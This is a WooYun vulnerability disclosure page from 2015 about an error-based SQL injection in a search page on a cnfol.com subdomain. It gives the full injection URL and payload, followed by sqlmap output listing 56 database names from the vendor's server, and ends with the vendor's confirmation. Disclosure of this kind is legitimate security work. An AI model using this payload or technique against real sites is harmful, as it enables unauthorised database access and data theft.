当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133991

漏洞标题:中金在线某站漏洞合集(注入+信息泄露)

相关厂商:福建中金在线网络股份有限公司

漏洞作者: 路人甲

提交时间:2015-08-14 09:51

修复时间:2015-10-01 09:26

公开时间:2015-10-01 09:26

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

20

详细说明:

http://app.cnfol.com/yishu/search.php?page=3&uid=1%20AND%20(SELECT%209709%20FROM(SELECT%20COUNT(*),CONCAT(0x717a6a7671,(SELECT%20(ELT(9709=9709,1))),0x71716b7171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)


报错注入
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: page=3&uid=1 AND (SELECT 9709 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(9709=9709,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
信息泄露

路径.png

漏洞证明:

---
[20:23:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[20:23:01] [INFO] fetching database names
[20:23:01] [INFO] heuristics detected web page charset 'ascii'
[20:23:01] [WARNING] reflective value(s) found and filtering out
[20:23:01] [INFO] the SQL query used returns 56 entries
[20:23:01] [INFO] retrieved: information_schema
[20:23:02] [INFO] retrieved: 20131217dbbac
[20:23:03] [INFO] retrieved: channel
[20:23:03] [INFO] retrieved: cloudqianyi
[20:23:18] [INFO] retrieved: cloudqianyifol_jiangu
[20:23:18] [INFO] retrieved: cloudqianyifol_live
[20:23:18] [INFO] retrieved: cloudqianyifol_show
[20:23:18] [INFO] retrieved: cnfol_accesslog
[20:23:18] [INFO] retrieved: cnfol_pic
[20:23:19] [INFO] retrieved: data_auto
[20:23:19] [INFO] retrieved: dazn
[20:23:19] [INFO] retrieved: fol_agent
[20:23:20] [INFO] retrieved: fol_agent_ago
[20:23:21] [INFO] retrieved: fol_auto_data
[20:23:21] [INFO] retrieved: fol_bankdata
[20:23:21] [INFO] retrieved: fol_blog_vote
[20:23:22] [INFO] retrieved: fol_blog_zw
[20:23:22] [INFO] retrieved: fol_car
[20:23:28] [INFO] retrieved: fol_coll
[20:23:28] [INFO] retrieved: fol_comment
[20:23:29] [INFO] retrieved: fol_data
[20:23:30] [INFO] retrieved: fol_event
[20:23:30] [INFO] retrieved: fol_finance_vote
[20:23:31] [INFO] retrieved: fol_finance_vote_2012
[20:23:31] [INFO] retrieved: fol_hkstock
[20:23:31] [INFO] retrieved: fol_hualang
[20:23:32] [INFO] retrieved: fol_image_vote
[20:23:33] [INFO] retrieved: fol_jiangu
[20:23:33] [INFO] retrieved: fol_jiangu_ago
[20:23:33] [INFO] retrieved: fol_jiangu_bad
[20:23:33] [INFO] retrieved: fol_live
[20:23:34] [INFO] retrieved: fol_live121203
[20:23:34] [INFO] retrieved: fol_live_ago
[20:23:34] [INFO] retrieved: fol_live_old_change
[20:23:48] [INFO] retrieved: fol_live_utf8
[20:23:48] [INFO] retrieved: fol_macdata
[20:23:49] [INFO] retrieved: fol_macdata1
[20:23:49] [INFO] retrieved: fol_macdata9
[20:23:52] [INFO] retrieved: fol_pic
[20:23:52] [INFO] retrieved: fol_reports
[20:24:03] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request
[20:24:04] [INFO] retrieved: fol_show
[20:24:04] [INFO] retrieved: fol_show_20121030latin1
[20:24:04] [INFO] retrieved: fol_special
[20:24:04] [INFO] retrieved: fol_stock_report
[20:24:04] [INFO] retrieved: fol_t_gegu
[20:24:04] [INFO] retrieved: fol_zhidao
[20:24:04] [INFO] retrieved: fol_zw
[20:24:04] [INFO] retrieved: icbc_cnfol_active
[20:24:05] [INFO] retrieved: insurance_products
[20:24:05] [INFO] retrieved: mysql
[20:24:05] [INFO] retrieved: mysql_backup
[20:24:05] [INFO] retrieved: phpcmsv9_tx
[20:24:05] [INFO] retrieved: pic
[20:24:05] [INFO] retrieved: roc
[20:24:05] [INFO] retrieved: stock_point_game
[20:24:06] [INFO] retrieved: temp_cloud_backup
available databases [56]:
[*] 20131217dbbac
[*] channel
[*] cloudqianyi
[*] cloudqianyifol_jiangu
[*] cloudqianyifol_live
[*] cloudqianyifol_show
[*] cnfol_accesslog
[*] cnfol_pic
[*] data_auto
[*] dazn
[*] fol_agent
[*] fol_agent_ago
[*] fol_auto_data
[*] fol_bankdata
[*] fol_blog_vote
[*] fol_blog_zw
[*] fol_car
[*] fol_coll
[*] fol_comment
[*] fol_data
[*] fol_event
[*] fol_finance_vote
[*] fol_finance_vote_2012
[*] fol_hkstock
[*] fol_hualang
[*] fol_image_vote
[*] fol_jiangu
[*] fol_jiangu_ago
[*] fol_jiangu_bad
[*] fol_live
[*] fol_live121203
[*] fol_live_ago
[*] fol_live_old_change
[*] fol_live_utf8
[*] fol_macdata
[*] fol_macdata1
[*] fol_macdata9
[*] fol_pic
[*] fol_reports
[*] fol_show
[*] fol_show_20121030latin1
[*] fol_special
[*] fol_stock_report
[*] fol_t_gegu
[*] fol_zhidao
[*] fol_zw
[*] icbc_cnfol_active
[*] information_schema
[*] insurance_products
[*] mysql
[*] mysql_backup
[*] phpcmsv9_tx
[*] pic
[*] roc
[*] stock_point_game
[*] temp_cloud_backup

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-17 09:24

厂商回复:

谢谢,我们会立即处理掉漏洞。

最新状态:

暂无